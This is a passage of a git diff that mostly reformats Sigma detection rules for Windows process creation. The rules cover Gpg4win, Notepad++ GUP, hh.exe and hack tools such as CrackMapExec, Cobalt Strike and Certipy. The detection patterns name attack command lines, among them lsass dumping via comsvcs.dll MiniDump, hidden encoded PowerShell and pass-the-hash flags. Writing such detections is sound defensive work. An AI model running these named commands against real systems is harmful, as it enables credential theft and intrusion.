a/sigma/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml @@ -18,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_metadata: - - NewProcessName|endswith: - - \gpg.exe - - \gpg2.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - NewProcessName|endswith: + - \gpg.exe + - \gpg2.exe + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -c ' - passphrase condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml b/sigma/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml index 03c5bd051..ab468cd92 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml @@ -1,8 +1,7 @@ title: Portable Gpg.EXE Execution id: 77df53a5-1d78-4f32-bc5a-0e7465bd8f41 status: experimental -description: Detects the execution of "gpg.exe" from uncommon location. Often used - by ransomware and loaders to decrypt/encrypt data. +description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. references: - https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a - https://securelist.com/locked-out/68960/ @@ -21,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \gpg.exe - - \gpg2.exe - - OriginalFileName: gpg.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - NewProcessName|endswith: + - \gpg.exe + - \gpg2.exe + - OriginalFileName: gpg.exe + - Description: GnuPG’s OpenPGP tool filter_main_legit_location: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\GNU\GnuPG\bin\ - :\Program Files (x86)\GnuPG VS-Desktop\ - :\Program Files (x86)\GnuPG\bin\ diff --git a/sigma/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml index 3d24f1224..6c1db8b37 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml @@ -1,8 +1,7 @@ title: File Encryption/Decryption Via Gpg4win From Suspicious Locations id: e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d status: experimental -description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially - suspicious locations. +description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. references: - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ @@ -19,15 +18,15 @@ detection: EventID: 4688 Channel: Security selection_metadata: - - NewProcessName|endswith: - - \gpg.exe - - \gpg2.exe - - Product: GNU Privacy Guard (GnuPG) - - Description: "GnuPG\u2019s OpenPGP tool" + - NewProcessName|endswith: + - \gpg.exe + - \gpg2.exe + - Product: GNU Privacy Guard (GnuPG) + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains: -passphrase + CommandLine|contains: -passphrase selection_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - :\Users\Public\ diff --git a/sigma/builtin/process_creation/proc_creation_win_gpresult_execution.yml b/sigma/builtin/process_creation/proc_creation_win_gpresult_execution.yml index 7bbf698f1..5fde56f02 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gpresult_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpresult_execution.yml @@ -1,8 +1,7 @@ title: Gpresult Display Group Policy Information id: e56d3073-83ff-4021-90fe-c658e0709e72 status: test -description: Detects cases in which a user uses the built-in Windows utility gpresult - to display the Resultant Set of Policy (RSoP) information +description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - /z - /v - NewProcessName|endswith: \gpresult.exe + NewProcessName|endswith: \gpresult.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml b/sigma/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml index ebc7581c1..88318efca 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml @@ -1,8 +1,7 @@ title: Arbitrary Binary Execution Using GUP Utility id: d65aee4d-2292-4cea-b832-83accd6cfa43 status: test -description: Detects execution of the Notepad++ updater (gup) to launch other commands - or executables +description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables references: - https://twitter.com/nas_bench/status/1535322445439180803 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,14 +18,14 @@ detection: Channel: Security selection: ParentProcessName|endswith: \gup.exe - NewProcessName|endswith: \explorer.exe + NewProcessName|endswith: \explorer.exe filter: - CommandLine|contains: \Notepad++\notepad++.exe - NewProcessName|endswith: \explorer.exe + CommandLine|contains: \Notepad++\notepad++.exe + NewProcessName|endswith: \explorer.exe filter_parent: ParentProcessName|contains: \Notepad++\updater\ filter_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter*) falsepositives: - Other parent binaries using GUP not currently identified diff --git a/sigma/builtin/process_creation/proc_creation_win_gup_download.yml b/sigma/builtin/process_creation/proc_creation_win_gup_download.yml index 44568303a..1f5bfc9e2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gup_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gup_download.yml @@ -1,8 +1,7 @@ title: File Download Using Notepad++ GUP Utility id: 44143844-0631-49ab-97a0-96387d6b2d7c status: test -description: Detects execution of the Notepad++ updater (gup) from a process other - than Notepad++ to download files. +description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. references: - https://twitter.com/nas_bench/status/1535322182863179776 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,17 +18,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \GUP.exe - - OriginalFileName: gup.exe + - NewProcessName|endswith: \GUP.exe + - OriginalFileName: gup.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -unzipTo ' - http filter: ParentProcessName|endswith: \notepad++.exe condition: process_creation and (all of selection* and not filter) falsepositives: - - Other parent processes other than notepad++ using GUP that are not currently - identified + - Other parent processes other than notepad++ using GUP that are not currently identified level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml b/sigma/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml index 2d07c5e77..420548a5d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml @@ -1,8 +1,7 @@ title: Suspicious GUP Usage id: 0a4f6091-223b-41f6-8743-f322ec84930b status: test -description: Detects execution of the Notepad++ updater in a suspicious directory, - which is often used in DLL side-loading attacks +description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks references: - https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html author: Florian Roth (Nextron Systems) @@ -19,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \GUP.exe + NewProcessName|endswith: \GUP.exe filter_programfiles: - NewProcessName|endswith: + NewProcessName|endswith: - \Program Files\Notepad++\updater\GUP.exe - \Program Files (x86)\Notepad++\updater\GUP.exe filter_user: - NewProcessName|contains: \Users\ - NewProcessName|endswith: + NewProcessName|contains: \Users\ + NewProcessName|endswith: - \AppData\Local\Notepad++\updater\GUP.exe - \AppData\Roaming\Notepad++\updater\GUP.exe condition: process_creation and (selection and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hh_chm_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hh_chm_execution.yml index 882b340d1..1d41d7926 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hh_chm_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hh_chm_execution.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: HH.exe - - NewProcessName|endswith: \hh.exe + - OriginalFileName: HH.exe + - NewProcessName|endswith: \hh.exe selection_cli: - CommandLine|contains: .chm + CommandLine|contains: .chm condition: process_creation and (all of selection_*) falsepositives: - False positives are expected with legitimate ".CHM" diff --git a/sigma/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml index 2dfcf639b..dbca408f4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml @@ -1,8 +1,7 @@ title: Remote CHM File Download/Execution Via HH.EXE id: f57c58b3-ee69-4ef5-9041-455bf39aaa89 status: experimental -description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" - files. +description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. references: - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: HH.exe - - NewProcessName|endswith: \hh.exe + - OriginalFileName: HH.exe + - NewProcessName|endswith: \hh.exe selection_cli: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml index 8245266b8..657e221be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml @@ -34,7 +34,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \hh.exe - NewProcessName|endswith: + NewProcessName|endswith: - \CertReq.exe - \CertUtil.exe - \cmd.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_hh_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hh_susp_execution.yml index 8c50f6a41..e34d34c84 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hh_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hh_susp_execution.yml @@ -33,16 +33,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: HH.exe - - NewProcessName|endswith: \hh.exe + - OriginalFileName: HH.exe + - NewProcessName|endswith: \hh.exe selection_paths: - CommandLine|contains: + CommandLine|contains: - .application - \AppData\Local\Temp\ - \Content.Outlook\ - \Downloads\ - \Users\Public\ - \Windows\Temp\ + # - '\AppData\Local\Temp\Temp?_' + # - '\AppData\Local\Temp\Rar$' + # - '\AppData\Local\Temp\7z' + # - '\AppData\Local\Temp\wz' + # - '\AppData\Local\Temp\peazip-tmp' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml index 45b350af1..5dfad6521 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml @@ -1,9 +1,7 @@ title: HackTool - ADCSPwn Execution id: cd8c163e-a19b-402e-bdd5-419ff5859f12 status: test -description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges - in an active directory network by coercing authenticate from machine accounts - and relaying to the certificate service +description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service references: - https://github.com/bats3c/ADCSPwn author: Florian Roth (Nextron Systems) @@ -20,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' --adcs ' - ' --port ' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml index 24d07f307..ca22a2952 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml @@ -1,8 +1,7 @@ title: HackTool - Bloodhound/Sharphound Execution id: f376c8a7-a2d0-4ddc-aa0c-16c17236d962 status: test -description: Detects command line parameters used by Bloodhound and Sharphound hack - tools +description: Detects command line parameters used by Bloodhound and Sharphound hack tools references: - https://github.com/BloodHoundAD/BloodHound - https://github.com/BloodHoundAD/SharpHound @@ -26,16 +25,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - Product|contains: SharpHound - - Description|contains: SharpHound - - Company|contains: - - SpecterOps - - evil corp - - NewProcessName|contains: - - \Bloodhound.exe - - \SharpHound.exe + - Product|contains: SharpHound + - Description|contains: SharpHound + - Company|contains: + - SpecterOps + - evil corp + - NewProcessName|contains: + - \Bloodhound.exe + - \SharpHound.exe selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' -CollectionMethod All ' - ' --CollectionMethods Session ' - ' --Loop --Loopduration ' @@ -44,11 +43,11 @@ detection: - Invoke-Bloodhound - Get-BloodHoundData selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -JsonFolder ' - ' -ZipFileName ' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' DCOnly ' - ' --NoSaveCache ' condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml index a27886f94..1fca01cfd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - .dll - StartNodeRelay diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_certify.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_certify.yml index 0771825f9..efd2830eb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_certify.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_certify.yml @@ -1,8 +1,7 @@ title: HackTool - Certify Execution id: 762f2482-ff21-4970-8939-0aa317a886bb status: experimental -description: Detects Certify a tool for Active Directory certificate abuse based on - PE metadata characteristics and common command line arguments. +description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. references: - https://github.com/GhostPack/Certify author: pH-T (Nextron Systems) @@ -20,18 +19,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Certify.exe - - OriginalFileName: Certify.exe - - Description|contains: Certify + - NewProcessName|endswith: \Certify.exe + - OriginalFileName: Certify.exe + - Description|contains: Certify selection_cli_commands: - CommandLine|contains: + CommandLine|contains: - '.exe cas ' - '.exe find ' - '.exe pkiobjects ' - '.exe request ' - '.exe download ' selection_cli_options: - CommandLine|contains: + CommandLine|contains: - ' /vulnerable' - ' /template:' - ' /altname:' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_certipy.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_certipy.yml index 3f3e43f20..14da6eccc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_certipy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_certipy.yml @@ -1,8 +1,7 @@ title: HackTool - Certipy Execution id: 6938366d-8954-4ddc-baff-c830b3ba8fcd status: experimental -description: Detects Certipy a tool for Active Directory Certificate Services enumeration - and abuse based on PE metadata characteristics and common command line arguments. +description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. references: - https://github.com/ly4k/Certipy author: pH-T (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Certipy.exe - - OriginalFileName: Certipy.exe - - Description|contains: Certipy + - NewProcessName|endswith: \Certipy.exe + - OriginalFileName: Certipy.exe + - Description|contains: Certipy selection_cli_commands: - CommandLine|contains: + CommandLine|contains: - ' auth ' - ' find ' - ' forge ' @@ -31,7 +30,7 @@ detection: - ' req ' - ' shadow ' selection_cli_flags: - CommandLine|contains: + CommandLine|contains: - ' -bloodhound' - ' -ca-pfx ' - ' -dc-ip ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml index 6dbbfc159..293606537 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml @@ -1,11 +1,10 @@ title: Operator Bloopers Cobalt Strike Commands id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 related: - - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 - type: similar + - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 + type: similar status: test -description: Detects use of Cobalt Strike commands accidentally entered in the CMD - shell +description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell references: - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/ @@ -25,14 +24,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: Cmd.Exe - - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe selection_cli: - CommandLine|startswith: + CommandLine|startswith: - 'cmd ' - cmd.exe - c:\windows\system32\cmd.exe - CommandLine|contains: + CommandLine|contains: - psinject - spawnas - make_token diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml index cd645ac24..e31d4d7e5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml @@ -1,8 +1,8 @@ title: Operator Bloopers Cobalt Strike Modules id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 related: - - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 - type: similar + - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 + type: similar status: test description: Detects Cobalt Strike module/commands accidentally entered in CMD shell references: @@ -23,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: Cmd.Exe - - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - Invoke-UserHunter - Invoke-ShareFinder - Invoke-Kerberoast diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml index 431e71917..46cf1054f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml @@ -1,8 +1,7 @@ title: CobaltStrike Load by Rundll32 id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 status: test -description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs - from the command line. +description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable - https://redcanary.com/threat-detection-report/ @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_rundll: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: - - rundll32.exe - - 'rundll32 ' + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: + - rundll32.exe + - 'rundll32 ' selection_params: - CommandLine|contains: .dll - CommandLine|endswith: + CommandLine|contains: .dll + CommandLine|endswith: - ' StartW' - ',StartW' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml index e401321a4..9898702a4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_generic_1: - CommandLine|endswith: cmd.exe /C whoami + CommandLine|endswith: cmd.exe /C whoami ParentProcessName|startswith: C:\Temp\ selection_generic_2: - CommandLine|contains|all: + CommandLine|contains|all: - cmd.exe /c echo - '> \\\\.\\pipe' ParentProcessName|endswith: @@ -32,10 +32,10 @@ detection: ParentCommandLine|contains|all: - cmd.exe /C echo - ' > \\\\.\\pipe' - CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 + CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 selection_conhost_2: ParentCommandLine|endswith: /C whoami - CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 + CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml index 95a0f52de..cb7f0751e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml @@ -19,18 +19,18 @@ detection: EventID: 4688 Channel: Security selection_loader_img: - NewProcessName|endswith: \CoercedPotato.exe + NewProcessName|endswith: \CoercedPotato.exe selection_params: - CommandLine|contains: ' --exploitId ' + CommandLine|contains: ' --exploitId ' selection_loader_imphash: - - Imphash: - - a75d7669db6b2e107a44c4057ff7f7d6 - - f91624350e2c678c5dcbe5e1f24e22c9 - - 14c81850a079a87e83d50ca41c709a15 - - Hashes: - - IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6 - - IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9 - - IMPHASH=14C81850A079A87E83D50CA41C709A15 + - Imphash: + - a75d7669db6b2e107a44c4057ff7f7d6 + - f91624350e2c678c5dcbe5e1f24e22c9 + - 14c81850a079a87e83d50ca41c709a15 + - Hashes: + - IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6 + - IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9 + - IMPHASH=14C81850A079A87E83D50CA41C709A15 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_covenant.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_covenant.yml index a44964feb..80992abef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_covenant.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_covenant.yml @@ -20,16 +20,16 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - -Sta - -Nop - -Window - Hidden - CommandLine|contains: + CommandLine|contains: - -Command - -EncodedCommand selection_2: - CommandLine|contains: + CommandLine|contains: - 'sv o (New-Object IO.MemorySteam);sv d ' - mshta file.hta - GruntHTTP diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml index d337255de..adf01b61f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml @@ -1,8 +1,7 @@ title: HackTool - CrackMapExec Execution id: 42a993dd-bb3e-48c8-b372-4d6684c4106c status: test -description: This rule detect common flag combinations used by CrackMapExec in order - to detect its use even if the binary has been replaced. +description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local - https://www.mandiant.com/resources/telegram-malware-iranian-espionage @@ -31,47 +30,47 @@ detection: EventID: 4688 Channel: Security selection_binary: - NewProcessName|endswith: \crackmapexec.exe + NewProcessName|endswith: \crackmapexec.exe selection_special: - CommandLine|contains: ' -M pe_inject ' + CommandLine|contains: ' -M pe_inject ' selection_execute: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -x ' selection_hash: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -p ' - - ' -H ''NTHASH''' + - " -H 'NTHASH'" selection_module_mssql: - CommandLine|contains|all: + CommandLine|contains|all: - ' mssql ' - ' -u ' - ' -p ' - ' -M ' - ' -d ' selection_module_smb1: - CommandLine|contains|all: + CommandLine|contains|all: - ' smb ' - ' -u ' - ' -H ' - ' -M ' - ' -o ' selection_module_smb2: - CommandLine|contains|all: + CommandLine|contains|all: - ' smb ' - ' -u ' - ' -p ' - ' --local-auth' part_localauth_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -p ' part_localauth_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' 10.' - ' 192.168.' - '/24 ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml index d90aee7ba..01df33b8b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml @@ -22,11 +22,16 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # cme/protocols/smb/wmiexec.py (generalized execute_remote and execute_fileless) - cmd.exe /Q /c * 1> \\\\*\\*\\* 2>&1 + # cme/protocols/smb/atexec.py:109 (fileless output via share) - cmd.exe /C * > \\\\*\\*\\* 2>&1 + # cme/protocols/smb/atexec.py:111 (fileless output via share) - cmd.exe /C * > *\\Temp\\* 2>&1 + # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L136 (PowerShell execution with obfuscation) - powershell.exe -exec bypass -noni -nop -w 1 -C " + # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L160 (PowerShell execution without obfuscation) - 'powershell.exe -noni -nop -w 1 -enc ' condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml index ce6ac21f4..4418f7334 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml @@ -1,8 +1,7 @@ title: HackTool - CrackMapExec Process Patterns id: f26307d8-14cd-47e3-a26b-4b4769f24af6 status: test -description: Detects suspicious process patterns found in logs when CrackMapExec is - used +description: Detects suspicious process patterns found in logs when CrackMapExec is used references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass author: Florian Roth (Nextron Systems) @@ -19,27 +18,27 @@ detection: EventID: 4688 Channel: Security selection_lsass_dump1: - CommandLine|contains|all: + CommandLine|contains|all: - 'tasklist /fi ' - Imagename eq lsass.exe - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c ' - 'cmd.exe /r ' - 'cmd.exe /k ' - 'cmd /c ' - 'cmd /r ' - 'cmd /k ' - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_lsass_dump2: - CommandLine|contains|all: + CommandLine|contains|all: - do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump - \Windows\Temp\ - ' full' - '%%B' selection_procdump: - CommandLine|contains|all: + CommandLine|contains|all: - tasklist /v /fo csv - findstr /i "lsass" condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml index 484642bca..2691d0a64 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml @@ -1,8 +1,7 @@ title: HackTool - CrackMapExec PowerShell Obfuscation id: 6f8b3439-a203-45dc-a88b-abf57ea15ccf status: test -description: The CrachMapExec pentesting framework implements a PowerShell obfuscation - with some static strings detected by this rule. +description: The 